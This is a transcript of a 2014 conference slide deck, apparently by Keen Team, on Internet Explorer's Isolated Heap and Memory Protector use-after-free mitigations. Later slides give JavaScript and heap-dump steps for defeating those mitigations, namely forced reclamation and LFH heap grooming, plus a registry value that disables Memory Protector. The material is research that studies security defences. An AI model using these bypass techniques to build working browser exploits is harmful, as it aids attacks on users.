new$exploitmi-gaon$ in$internetexplorer$ - hitconhitcon.org/2014/downloads/p2_01_keen team - new...
TRANSCRIPT
![Page 1: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/1.jpg)
New Exploit Mi-ga-on In Internet Explorer
HITCON X @K33nTeam @KeenTeam
@promised_lu
![Page 2: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/2.jpg)
About Me
Amateur browser exploiter Main work is wri-ng fuzzers
2
![Page 3: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/3.jpg)
3
Background
![Page 4: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/4.jpg)
Internet Explorer Vulnerability Sta-s-cs
4
![Page 5: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/5.jpg)
2013
• CVE-‐2013-‐0025 CParaElement Use-‐ARer-‐Free • CVE-‐2013-‐1311 CDOMTextNode Use-‐ARer-‐Free • CVE-‐2013-‐1347 CGenericElement Use-‐ARer-‐Free • CVE-‐2013-‐2551 COALineDashStyleArray Integer Overflow Pwn2Own • CVE-‐2013-‐3184 CFlatMarkupPointer Use-‐ARer-‐Free • CVE-‐2013-‐3205 CCaret Use-‐ARer-‐Free • CVE-‐2013-‐3893 CTreeNode Use-‐ARer-‐Free • CVE-‐2013-‐3897 CDisplayPointer Use-‐ARer-‐Free
5
![Page 6: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/6.jpg)
2013
• 129 CVE • Most are Use-‐ARer-‐Free
6
![Page 7: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/7.jpg)
2014
• CVE-‐2014-‐0322 CMarkup Use-‐ARer-‐Free • CVE-‐2014-‐1776 CMarkup Use-‐ARer-‐Free
7
![Page 8: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/8.jpg)
2014
• 135 CVE from January to July • More than 2013
8
![Page 9: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/9.jpg)
Exploit Mi-ga-on
• Virtual Table Guard is introduced in Internet Explorer 10 • An--‐Use-‐ARer-‐Free
9
![Page 10: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/10.jpg)
Virtual Table Guard
10
![Page 11: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/11.jpg)
New Exploit Mi-ga-on
• Isolated Heap is introduced in MS14-‐035 • Memory Protector is introduced in MS14-‐037 • Internet Explorer 6~11 • An--‐Use-‐ARer-‐Free
11
![Page 12: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/12.jpg)
Agenda
• Isolated Heap • Memory Protector • Fuzzing Issues • Countermeasures
12
![Page 13: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/13.jpg)
13
Isolated Heap
![Page 14: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/14.jpg)
g_hIsolatedHeap
g_hIsolatedHeap = HeapCreate(0, 0, 0); if (g_hIsolatedHeap) { ULONG HeapInformation = 2; // Enable LFH HeapSetInformation(g_hIsolatedHeap, 0, &HeapInformation, sizeof(HeapInformation)); }
14
![Page 15: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/15.jpg)
_MemIsolatedAlloc
LPVOID __stdcall _MemIsolatedAlloc(SIZE_T dwBytes) { if (!dwBytes) dwBytes = 1; return HeapAlloc(g_hIsolatedHeap, 0, dwBytes); }
15
![Page 16: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/16.jpg)
_MemIsolatedAllocClear
LPVOID __stdcall _MemIsolatedAllocClear(SIZE_T dwBytes) { return HeapAlloc(g_hIsolatedHeap, 8, dwBytes); }
16
![Page 17: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/17.jpg)
_MemIsolatedFree
void __stdcall _MemIsolatedFree(LPVOID lpMem) { if (lpMem) MemoryProtection::HeapFree(g_hIsolatedHeap, 0, lpMem); }
17
![Page 18: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/18.jpg)
Internet Explorer 6
18
![Page 19: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/19.jpg)
Internet Explorer 6
19
![Page 20: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/20.jpg)
Isolated Objects
• All DOM Objects • Some Render Objects
20
![Page 21: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/21.jpg)
How To Fill Isolated Objects In Use-‐ARer-‐Free
• BSTR ! • String ! • Struct ! • Isolated Object "
21
![Page 22: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/22.jpg)
22
Memory Protector
![Page 23: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/23.jpg)
ULONG_PTR m_Block; // address of heap block SIZE_T m_Size; // size of heap block
SBlockDescriptor
23
![Page 24: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/24.jpg)
SBlockDescriptorArray
SBlockDescriptor *m_BlockDescriptors; // array of heap blocks SIZE_T m_Size; // total size of all heap blocks ULONG m_Count; // count of heap blocks
24
![Page 25: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/25.jpg)
MemoryProtec-on::HeapFree
• Replace HeapFree in MSHTML
25
![Page 26: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/26.jpg)
MemoryProtec-on::HeapFree
BOOL __stdcall MemoryProtection::HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem) { CMemoryProtector::ProtectedFree(hHeap, dwFlags, lpMem); return TRUE; }
26
![Page 27: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/27.jpg)
CMemoryProtector::ProtectedFree
• Reclaim memory • Add heap block to SBlockDescriptorArray instead of free
27
![Page 28: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/28.jpg)
CMemoryProtector::ProtectedFree
static void __stdcall CMemoryProtector::ProtectedFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem) { … MemoryProtector-‐>ReclaimMemory((ULONG_PTR *)&lpMem, 100000); … if (MemoryProtector-‐>AddBlockDescriptor((ULONG_PTR)lpMem, hHeap == g_hIsolatedHeap, &Size)) memset(lpMem, 0, Size); … }
28
![Page 29: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/29.jpg)
CMemoryProtector::ReclaimMemory
• Do nothing if total size of SBlockDescriptorArray is less than 100000 • Mark blocks • Reclaim unmarked blocks
29
![Page 30: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/30.jpg)
CMemoryProtector::ReclaimMemory
void CMemoryProtector::ReclaimMemory(ULONG_PTR *Blocks, UINT Size) { if (GetCount() && (GetSize() >= Size || m_ForceReclaim)) { MarkBlocks(Blocks); ReclaimUnmarkedBlocks(); } }
30
![Page 31: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/31.jpg)
CMemoryProtector::ReclaimMemory
Stack Array
lpMem
RetAddr
…
Pointer
…
Block 1
…
…
Block N
…
31
![Page 32: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/32.jpg)
CMemoryProtector::MarkBlocks
• Traverse thread stack as array of pointers • If a pointer points to a block in SBlockDescriptorArray, mark the block
32
![Page 33: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/33.jpg)
CMemoryProtector::MarkBlocks
void CMemoryProtector::MarkBlocks(ULONG_PTR *Blocks) { ULONG_PTR Low = LowAddress(); ULONG_PTR High = HighAddress(); for (ULONG i = (m_StackHighAddress -‐ (ULONG_PTR)Blocks) / sizeof(ULONG_PTR); i != 0; i-‐-‐) MarkBlockForAddress(*Blocks++, Low, High); }
33
![Page 34: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/34.jpg)
CMemoryProtector::MarkBlocks
Stack Array
lpMem
RetAddr
…
Pointer
…
Block 1
…
…
Block N
…
34
![Page 35: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/35.jpg)
CMemoryProtector::ReclaimUnmarkedBlocks
• Free unmarked blocks • Unmark marked blocks
35
![Page 36: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/36.jpg)
CMemoryProtector::ReclaimUnmarkedBlocks
void CMemoryProtector::ReclaimUnmarkedBlocks() { for (ULONG i = 0; i < GetCount(); i++) { SBlockDescriptor *BlockDescriptor = GetBlockDescriptorAt(i); … if (BlockDescriptor-‐>IsMarked()) BlockDescriptor-‐>Unmark();
else ::HeapFree(hHeap, 0, (LPVOID)BlockDescriptor-‐>BaseAddress()); … } }
36
![Page 37: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/37.jpg)
CMemoryProtector::ReclaimUnmarkedBlocks
Stack Array
lpMem
RetAddr
…
Pointer
…
Freed
Freed
Freed
Block N
Freed
37
![Page 38: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/38.jpg)
Visual Studio Port
• heps://github.com/promised-‐lu/MemoryProtec-on
38
![Page 39: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/39.jpg)
Delay Free Or Never Use-‐ARer-‐Free
• Unable to fill Use-‐ARer-‐Free Object
39
![Page 40: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/40.jpg)
40
Fuzzing Issues
![Page 41: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/41.jpg)
Isolated Heap
• Isolated Heap reduces probability of Use-‐ARer-‐Free if PageHeap is turned off
• Patch g_hIsolatedHeap to Process Heap
41
![Page 42: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/42.jpg)
Memory Protector
• Memory Protector sharply reduces probability of Use-‐ARer-‐Free • Patch memset in CMemoryProtector::ProtectedFree (inline problem) • Turn off Memory Protector through registry
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MEMPROTECT_MODE] "iexplore.exe"=dword:00000000
42
![Page 43: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/43.jpg)
43
Countermeasures
![Page 44: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/44.jpg)
Free Problem
• Fill SBlockDescriptorArray to trigger ReclaimUnmarkedBlocks • Windows 7 x86 • Internet Explorer 11
44
![Page 45: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/45.jpg)
CollectGarbage2
function CollectGarbage2() { var video = new Array(); for (var i = 0; i < 250; i++) { video[i] = document.createElement("video"); // 400 bytes } video = null; CollectGarbage(); // ReclaimUnmarkedBlocks }
45
![Page 46: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/46.jpg)
Delay Free Situa-on ☺
// Free Use-‐After-‐Free Object // Use-‐After-‐Free Object not referred in stack CollectGarbage2(); // Free Use-‐After Object indeed // Fill Use-‐After-‐Free Object // Use Use-‐After-‐Free Object
46
![Page 47: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/47.jpg)
Never Use-‐ARer-‐Free Situa-on !
// Trigger Event // Use Use-‐After-‐Free Object // Cannot refer to Use-‐After-‐Free Object
// Event // Free Use-‐After-‐Free Object // Use-‐After-‐Free Object referred in stack
47
![Page 48: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/48.jpg)
Case By Case "
• Many paths can trigger same Use-‐ARer-‐Free • It’s hard to say
48
![Page 49: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/49.jpg)
Fill Problem
• Manipulate LFH • Windows 7 x86 • Internet Explorer 11
49
![Page 50: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/50.jpg)
Step 1
<!DOCTYPE html> <html> <head> <script> function load() { // Step 1 … } </script> </head> <body onload="load()"></body> </html>
50
![Page 51: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/51.jpg)
Step 1
0:007> !heap -‐p -‐h poi(MSHTML!g_hIsolatedHeap) _HEAP @ 3ac0000 _LFH_HEAP @ 3ac44f0 _HEAP_SEGMENT @ 3ac0000 CommittedRange @ 3ac0588 HEAP_ENTRY Size Prev Flags UserPtr UserSize -‐ state … 03ad5130 003b 0086 [00] 03ad5138 001d0 -‐ (busy) MSHTML!CWindow::`vftable‘ … VirtualAllocdBlocks @ 3ac00a0
51
![Page 52: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/52.jpg)
Step 2
var Bucket1 = new Array(); // Enable LFH for (var i = 0; i < 0x11; i++) { Bucket1[i] = document.createElement("option"); } var UserBlocks1 = new Array(); for (var i = 0; i < Math.floor((0x1000 -‐ 0x8 -‐ 0x10) / (0x50 + 0x8)); i++) { UserBlocks1[i] = document.createElement("option"); } var UserBlocks2 = new Array(); for (var i = 0; i < Math.floor((0x1000 -‐ 0x8 -‐ 0x10) / (0x50 + 0x8)); i++) { UserBlocks2[i] = document.createElement("option"); }
52
![Page 53: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/53.jpg)
Step 2
0:007> !heap -‐p -‐h poi(MSHTML!g_hIsolatedHeap) … * 03ad6650 0200 000b [00] 03ad6658 00ff8 -‐ (busy) // UserBlocks1 03ad6668 000b 0200 [00] 03ad6670 0004c -‐ (busy) MSHTML!COptionElement::`vftable' … * 03ad7a50 0200 0080 [00] 03ad7a58 00ff8 -‐ (busy) // UserBlocks2 03ad7a68 000b 0200 [00] 03ad7a70 0004c -‐ (busy) MSHTML!COptionElement::`vftable' … VirtualAllocdBlocks @ 3ac00a0
53
![Page 54: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/54.jpg)
Step 3
UserBlocks1 = null; CollectGarbage(); CollectGarbage2();
54
![Page 55: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/55.jpg)
Step 3
0:007> !heap -‐p -‐h poi(MSHTML!g_hIsolatedHeap) … * 03ad6650 0200 000b [00] 03ad6658 00ff8 -‐ (busy) // UserBlocks1 … * 03ad7a50 0200 0080 [00] 03ad7a58 00ff8 -‐ (busy) // UserBlocks2 03ad7a68 000b 0200 [00] 03ad7a70 0004c -‐ (busy) MSHTML!COptionElement::`vftable' … VirtualAllocdBlocks @ 3ac00a0
55
![Page 56: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/56.jpg)
Step 4
var Bucket2 = new Array(); // Enable LFH for (var i = 0; i < 0x11; i++) { Bucket2[i] = document.createElement("area"); } var UserBlocks1 = new Array(); for (var i = 0; i < Math.floor((0x1000 -‐ 0x8 -‐ 0x10) / (0x68 + 0x8)); i++) { UserBlocks1[i] = document.createElement("area"); }
56
![Page 57: New$ExploitMi-gaon$ In$InternetExplorer$ - HITCONhitcon.org/2014/downloads/P2_01_Keen Team - New Exploit...2013 • CVE20130025 CParaElementUseAerFree$ • CVE20131311 CDOMTextNodeUseAerFree$](https://reader033.vdocuments.net/reader033/viewer/2022042118/5e971fe0b6190a169a3abbd4/html5/thumbnails/57.jpg)
Step 4
